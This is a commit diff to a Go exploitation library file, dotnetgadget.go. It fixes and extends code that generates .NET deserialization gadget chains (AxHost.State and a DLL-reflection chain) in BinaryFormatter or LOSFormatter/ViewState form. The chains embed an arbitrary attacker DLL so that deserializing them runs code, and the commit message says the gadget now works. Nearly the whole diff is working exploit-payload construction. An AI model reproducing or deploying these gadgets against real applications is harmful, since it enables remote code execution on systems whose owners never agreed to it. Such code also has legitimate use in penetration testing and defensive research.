new gadget works

Author: lobsterjerusalem

dotnet/dotnetgadget.go

@@ -109,17 +109,17 @@ func IsValidXML(data []byte) bool {
 	return xml.Unmarshal(data, new(interface{})) == nil
 }
 
-func CreateAxHostStateDLL(program string, args string) (string, bool) {
+func CreateAxHostStateDLL(DLLBytes []byte, formatter string) (string, bool) {
 	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	className := "System.Windows.Forms.AxHost+State"
 	memberNames := []string{"PropertyBagBinary"}
-	additionalInfo := []interface{}{PrimitiveTypeEnum["PrimitiveArray"]}
+	additionalInfo := []interface{}{PrimitiveTypeEnum["Byte"]}
 	memberValues := []interface{}{MemberReferenceRecord{IDRef: 3}}
 	memberTypes := []string{
-		"Object",
+		"PrimitiveArray",
 	}
 
-	innerNewGadget, ok := CreateDLLReflection([]byte("nonsense-placeholder"))
+	innerNewGadget, ok := CreateDLLReflection(DLLBytes, BinaryFormatter)
 	if !ok {
 		return "", false
 	}
@@ -153,10 +153,19 @@ func CreateAxHostStateDLL(program string, args string) (string, bool) {
 	}
 
 	payload := serializationHeaderRecordString + binLibString + classWithMembersAndTypesString + arraySinglePrimitiveRecordString + string(byte(RecordTypeEnumMap["MessageEnd"]))
-	return payload, true
+
+	switch formatter {
+	case LOSFormatter:
+		return FormatLOS(payload), true
+	case BinaryFormatter:
+		return payload, true
+	default:
+		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+		return "", false
+	}
 }
 
-func CreateDLLReflection(DLLBytes []byte) (string, bool) {
+func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	// This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one.
 	var finalGadget string
 	var records []Record
@@ -306,7 +315,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		PrimitiveTypeEnum["Single"],
 		PrimitiveTypeEnum["Int32"],
 		"System.Collections.IComparer",
-		"$System.Collections.IHashCodeProvider",
+		"System.Collections.IHashCodeProvider",
 		PrimitiveTypeEnum["Int32"],
 	})
 	if !ok {
@@ -315,7 +324,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 	systemClassWithMembersAndTypesID12 := SystemClassWithMembersAndTypesRecord{
 		ClassInfo: ClassInfo{
 			ObjectID:    12,
-			Name:        "System.Collection.Hashtable",
+			Name:        "System.Collections.Hashtable",
 			MemberCount: len(ID12MemberNames),
 			MemberNames: ID12MemberNames,
 		},
@@ -358,7 +367,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		},
 		MemberTypeInfo: ID15MemberTypeInfo,
 		MemberValues: []interface{}{
-			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly,     mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			PrimitiveInt32(4),
 			BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"},
 		},
@@ -543,9 +552,9 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 			MemberReferenceRecord{IDRef: 8},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(10)},
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)}, // PrimitiveByte "renders" the same. This should get cleaned up later
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
-			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)}, // PrimitiveByte "renders" the same. This should get cleaned up later
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Boolean"], Value: PrimitiveByte(0)},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
 		},
 	}
@@ -563,7 +572,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 			4,
 			BinaryObjectRecord{
 				ObjectID: 58,
-				Value:    "ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+				Value:    "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 			},
 		},
 	}
@@ -1002,7 +1011,7 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 		MemberTypeInfo: ID130MemberTypeInfo,
 		MemberValues: []interface{}{
 			PrimitiveInt32(1959924499), //  expected hex ref just in case I screwed this up: 13 13 d2 74
-			PrimitiveInt16(15086),      //  expected hex ref ee 2a
+			PrimitiveInt16(10990),      //  expected hex ref ee 2a
 			PrimitiveInt16(4561),       // expected hex ref d1 11
 			PrimitiveByte(0x8b),
 			PrimitiveByte(0xfb),
@@ -1026,7 +1035,15 @@ func CreateDLLReflection(DLLBytes []byte) (string, bool) {
 	}
 	finalGadget += string(byte(RecordTypeEnumMap["MessageEnd"]))
 
-	return finalGadget, true
+	switch formatter {
+	case LOSFormatter:
+		return FormatLOS(finalGadget), true
+	case BinaryFormatter:
+		return finalGadget, true
+	default:
+		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+		return "", false
+	}
 }
 
 func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {